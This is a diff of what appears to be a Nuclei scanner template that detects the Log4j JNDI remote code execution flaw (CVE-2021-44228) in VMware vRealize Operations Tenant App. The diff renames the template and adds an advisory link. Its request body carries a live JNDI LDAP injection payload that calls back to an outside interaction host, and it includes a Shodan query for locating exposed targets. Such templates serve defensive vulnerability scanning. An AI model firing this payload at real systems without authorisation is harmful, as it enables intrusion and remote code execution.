--- a/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
+++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -1,10 +1,11 @@
-id: vrealize-operations-tenant-app-log4j-rce
+id: vrealize-operations-log4j-rce
 
 info:
   name: vRealize Operations Tenant App Log4j JNDI RCE
   author: bughuntersurya
   severity: critical
   description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
+  reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
   metadata:
     shodan-query: http.title:"vRealize Operations Tenant App"
   tags: rce,log4j,vmware,vrealize
@@ -17,7 +18,6 @@ requests:
         Content-Type: application/json
         Origin: {{RootURL}}
         Referer: {{RootURL}}/ui/
-        
 
         {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
 
